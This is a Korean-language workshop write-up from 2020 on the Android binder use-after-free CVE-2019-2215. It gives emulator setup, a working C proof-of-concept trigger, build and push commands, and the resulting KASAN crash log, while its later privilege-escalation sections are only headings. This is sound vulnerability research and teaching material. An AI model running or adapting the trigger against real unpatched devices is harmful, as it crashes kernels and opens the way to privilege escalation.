ashfaq@hacksys:~/workshop/android-4.14-dev$ emulator -show-kernel -no-snapshot -wipe-data -avd CVE-2019-2215 -kernel ~/workshop/android-4.14-dev/out/kasan/dist/bzImage
  • show-kernel flag 터미널에서 커널 디버그 메세지를 보여준다
  • other command
1
[    0.000000] kasan: KernelAddressSanitizer initialized

다음이 보이면 부트에 성공한것

Crash

PoC(proof of concept)를 이르켜보자

다음 파일을 사용할 것이다. workshop/exploit/trigger.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <stdio.h>

#define BINDER_THREAD_EXIT 0x40046208ul

int main() {
    int fd, epfd;
    struct epoll_event event = {.events = EPOLLIN};

    fd = open("/dev/binder", O_RDONLY);
    epfd = epoll_create(1000);
    epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
    ioctl(fd, BINDER_THREAD_EXIT, NULL);
}
1
2
3
4
5
6
7
8
9
10
11
ashfaq@hacksys:~/workshop$ cd exploit/
ashfaq@hacksys:~/workshop/exploit$ NDK_ROOT=~/Android/Sdk/ndk/21.0.6113669 make build-trigger push-trigger
Building: cve-2019-2215-trigger
Pushing: cve-2019-2215-trigger to /data/local/tmp
cve-2019-2215-trigger: 1 file pushed, 0 skipped. 44.8 MB/s (3958288 bytes in 0.084s)
ashfaq@hacksys:~/workshop/exploit$ adb shell
generic_x86_64:/ $ uname -a
Linux localhost 4.14.150+ #1 repo:q-goldfish-android-goldfish-4.14-dev SMP PREEMPT Sat Apr x86_64
generic_x86_64:/ $ cd /data/local/tmp
generic_x86_64:/data/local/tmp $ ./cve-2019-2215-trigger
generic_x86_64:/data/local/tmp $
  • make
  • adb
    • uname -a : 리눅스 내부 버전 확인

에뮬레이터를 띄운 터미널을 보면 카산에서 crash log를 띄운것을 볼 수 있다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
[  382.398561] ==================================================================
[  382.402796] BUG: KASAN: use-after-free in _raw_spin_lock_irqsave+0x3a/0x5d
[  382.405929] Write of size 4 at addr ffff88804e4865c8 by task cve-2019-2215-t/7682
[  382.409386] 
[  382.410127] CPU: 1 PID: 7682 Comm: cve-2019-2215-t Tainted: G        W       4.14.150+ #1
[  382.413871] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org 04/01/2014
[  382.417931] Call Trace:
[  382.419106]  dump_stack+0x78/0xbe
[  382.420596]  print_address_description+0x81/0x25d
[  382.422146]  ? _raw_spin_lock_irqsave+0x3a/0x5d
[  382.423691]  __kasan_report+0x14f/0x180
[  382.425082]  ? _raw_spin_lock_irqsave+0x3a/0x5d
[  382.426437]  kasan_report+0x26/0x49
[  382.427468]  check_memory_region+0x171/0x17e
[  382.428725]  kasan_check_write+0x14/0x16
[  382.429884]  _raw_spin_lock_irqsave+0x3a/0x5d
[  382.431010]  remove_wait_queue+0x27/0x122
[  382.432003]  ? fsnotify_unmount_inodes+0x1e8/0x1e8
[  382.433156]  ep_unregister_pollwait+0x160/0x1bd
[  382.434252]  ep_free+0x8b/0x181
[  382.435024]  ? ep_eventpoll_poll+0x228/0x228
[  382.435953]  ep_eventpoll_release+0x48/0x54
[  382.436825]  __fput+0x1f2/0x51d
[  382.437483]  ____fput+0x15/0x18
[  382.438145]  task_work_run+0x127/0x154
[  382.438932]  do_exit+0x818/0x2384
[  382.439642]  ? mm_update_next_owner+0x52f/0x52f
[  382.440555]  do_group_exit+0x12c/0x24b
[  382.441247]  ? do_group_exit+0x24b/0x24b
[  382.441964]  SYSC_exit_group+0x17/0x17
[  382.442652]  SyS_exit_group+0x14/0x14
[  382.443264]  do_syscall_64+0x19e/0x225
[  382.443920]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[  382.444784] RIP: 0033:0x4047d7
[  382.445341] RSP: 002b:00007ffe9760fe18 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7
[  382.446661] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00000000004047d7
[  382.447904] RDX: 0000000000000002 RSI: 0000000000001000 RDI: 0000000000000000
[  382.449190] RBP: 0000000000000000 R08: 0000000000482335 R09: 0000000000000000
[  382.450517] R10: 00007ffe9760fe10 R11: 0000000000000246 R12: 0000000000400190
[  382.451889] R13: 00000000004a4618 R14: 00000000004002e0 R15: 00007ffe9760fee0
[  382.453146] 
[  382.453427] Allocated by task 7682:
[  382.454054]  save_stack_trace+0x16/0x18
[  382.454738]  __kasan_kmalloc+0x133/0x1cc
[  382.455445]  kasan_kmalloc+0x9/0xb
[  382.456063]  kmem_cache_alloc_trace+0x1bd/0x26f
[  382.456869]  binder_get_thread+0x166/0x6db
[  382.457605]  binder_poll+0x4c/0x1c2
[  382.458235]  SyS_epoll_ctl+0x1558/0x24f0
[  382.458910]  do_syscall_64+0x19e/0x225
[  382.459598]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[  382.460525]  0xffffffffffffffff
[  382.461085] 
[  382.461334] Freed by task 7682:
[  382.461762]  save_stack_trace+0x16/0x18
[  382.462222]  __kasan_slab_free+0x18f/0x23f
[  382.462711]  kasan_slab_free+0xe/0x10
[  382.463149]  kfree+0x193/0x5b3
[  382.463538]  binder_thread_dec_tmpref+0x192/0x1d9
[  382.464095]  binder_thread_release+0x464/0x4bd
[  382.464623]  binder_ioctl+0x48a/0x101c
[  382.465071]  do_vfs_ioctl+0x608/0x106a
[  382.465518]  SyS_ioctl+0x75/0xa4
[  382.465906]  do_syscall_64+0x19e/0x225
[  382.466358]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[  382.466953]  0xffffffffffffffff
[  382.467335] 
[  382.467783] The buggy address belongs to the object at ffff88804e486528
[  382.467783]  which belongs to the cache kmalloc-512 of size 512
[  382.469983] The buggy address is located 160 bytes inside of
[  382.469983]  512-byte region [ffff88804e486528, ffff88804e486728)
[  382.472065] The buggy address belongs to the page:
[  382.472915] page:ffffea0001392100 count:1 mapcount:0 mapping:          (null) index:0xffff88804e4872a8 compound_mapcount: 0
[  382.474871] flags: 0x4000000000010200(slab|head)
[  382.475744] raw: 4000000000010200 0000000000000000 ffff88804e4872a8 000000010012000e
[  382.476960] raw: ffffea00015fb220 ffff88805ac01650 ffff88805ac0cf40 0000000000000000
[  382.478072] page dumped because: kasan: bad access detected
[  382.478784] 
[  382.478973] Memory state around the buggy address:
[  382.479571]  ffff88804e486480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  382.480479]  ffff88804e486500: fc fc fc fc fc fb fb fb fb fb fb fb fb fb fb fb
[  382.481318] >ffff88804e486580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  382.482155]                                               ^
[  382.482806]  ffff88804e486600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  382.483648]  ffff88804e486680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  382.484485] ==================================================================
  • Use after Free
  • kmalloc-512 캐시에 존재하는 dangling pointer(free 후 해제된 메모리를 가르키는 포인터)가 원인이다.

KASan Symbolizer

Scripted Privilege Escalation

실제 privilege escalation을 하는것에 대한 실습

Kernel Debugging

Root Cause Analysis

Posted 2020-06-19